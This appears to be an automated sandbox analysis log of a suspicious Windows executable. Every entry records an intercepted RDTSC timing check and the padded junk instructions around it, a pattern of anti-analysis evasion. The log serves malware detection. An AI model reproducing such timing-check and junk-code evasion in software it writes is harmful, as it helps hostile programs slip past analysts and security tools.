Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712CF second address: F712D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712D3 second address: F712DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F76F4D second address: F76F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EF88 second address: F7EF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EF9B second address: F7EFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E27 second address: F80E65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4FB8D62289h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F4FB8D6227Eh 0x00000016 jmp 00007F4FB8D6227Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E65 second address: F80E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F4FB8FDD4F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E71 second address: F80E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80CCA second address: F80CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84721 second address: F84727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84727 second address: F84731 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FB8FDD4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84731 second address: F84737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84737 second address: F8475A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD509h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F4FB8FDD4F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8475A second address: F8476D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8476D second address: F84779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8BB0E second address: F8BB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A6A0 second address: F8A6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A820 second address: F8A824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A9B1 second address: F8AA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8FDD4F6h 0x0000000a push eax 0x0000000b jc 00007F4FB8FDD4F6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jns 00007F4FB8FDD510h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4FB8FDD4FCh 0x00000026 popad 0x00000027 jbe 00007F4FB8FDD4F8h 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8ACE9 second address: F8AD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62283h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AD00 second address: F8AD0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AD0D second address: F8AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F4FB8D62282h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9FB73 second address: E9FB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3A16 second address: FA3A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4FB8D62276h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB0CAE second address: FB0CB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4FB8FDD4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9D68 second address: FC9DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62288h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4FB8D62284h 0x00000010 jno 00007F4FB8D62276h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4FB8D62288h 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 jg 00007F4FB8D62276h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DC9 second address: FC9DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DCE second address: FC9DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FB8D62285h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA5CB second address: FCA5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007F4FB8FDD510h 0x0000000d jmp 00007F4FB8FDD504h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA96F second address: FCA979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA979 second address: FCA97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA97E second address: FCA983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA983 second address: FCA989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD945 second address: FCD949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD949 second address: FCD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC00DA second address: 4CC0138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4FB8D6227Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, di 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F4FB8D62283h 0x0000001c adc ax, 277Eh 0x00000021 jmp 00007F4FB8D62289h 0x00000026 popfd 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0138 second address: 4CC0166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F4FB8FDD500h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0166 second address: 4CC016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC016C second address: 4CC01A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4FB8FDD505h 0x00000016 sub ch, 00000076h 0x00000019 jmp 00007F4FB8FDD501h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F03 second address: 4CA0F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F07 second address: 4CA0F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD508h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F23 second address: 4CA0F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F4FB8D62280h 0x00000015 sbb ch, FFFFFF98h 0x00000018 jmp 00007F4FB8D6227Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F52 second address: 4CA0F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, FCh 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FB8FDD509h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F7B second address: 4CA0F81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F81 second address: 4CA0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F87 second address: 4CA0FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62286h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, 45A5681Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0FAD second address: 4CA0FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4FB8FDD507h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0E9F second address: 4CE0EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EA5 second address: 4CE0EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EA9 second address: 4CE0EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EAD second address: 4CE0EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4FB8FDD506h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F4FB8FDD4FCh 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C800F3 second address: 4C80142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007F4FB8D62287h 0x00000017 and cx, 8C5Eh 0x0000001c jmp 00007F4FB8D62289h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80142 second address: 4C80152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80152 second address: 4C80156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80156 second address: 4C8017F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4FB8FDD508h 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017F second address: 4C80190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80190 second address: 4C80194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80194 second address: 4C801F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007F4FB8D6227Dh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4FB8D6227Ch 0x0000001a add eax, 1E741448h 0x00000020 jmp 00007F4FB8D6227Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F4FB8D62286h 0x0000002e add ah, FFFFFFA8h 0x00000031 jmp 00007F4FB8D6227Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A0 second address: 4D004A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A4 second address: 4D004A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A8 second address: 4D004AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00311 second address: 4D00317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00317 second address: 4D0031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0252 second address: 4CA0276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0276 second address: 4CA02C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4FB8D62286h 0x00000008 add esi, 5BEF81D8h 0x0000000e jmp 00007F4FB8D6227Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F4FB8D62288h 0x0000001b pop edi 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02C4 second address: 4CA02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00727 second address: 4D00793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F4FB8D6227Bh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F4FB8D62286h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4FB8D6227Eh 0x0000001f xor eax, 48BB0488h 0x00000025 jmp 00007F4FB8D6227Bh 0x0000002a popfd 0x0000002b mov bh, cl 0x0000002d popad 0x0000002e push dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F4FB8D6227Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00793 second address: 4D00799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00799 second address: 4D0079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0079D second address: 4D007A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0082A second address: 4D00830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF069 second address: EDF073 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF073 second address: EDF07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF2DB second address: EDF2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF52E second address: EDF534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF534 second address: EDF538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF538 second address: EDF55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8D62289h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE21CE second address: EE21D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0544 second address: 4CB056E instructions: 0x00000000 rdtsc 0x00000002 call 00007F4FB8D62288h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 33C58136h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB056E second address: 4CB0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0572 second address: 4CB0581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0581 second address: 4CB0587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0587 second address: 4CB058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB058B second address: 4CB05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c call 00007F4FB8FDD4FDh 0x00000011 pop ecx 0x00000012 pushad 0x00000013 mov dh, 7Fh 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4FB8FDD508h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05CA second address: 4CB05D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05D9 second address: 4CB05DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05DF second address: 4CB05E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05E3 second address: 4CB05E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05E7 second address: 4CB064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007F4FB8D62287h 0x0000000f call 00007F4FB8D62279h 0x00000014 jmp 00007F4FB8D62286h 0x00000019 push eax 0x0000001a jmp 00007F4FB8D6227Bh 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F4FB8D62284h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB064D second address: 4CB0653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0653 second address: 4CB0657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
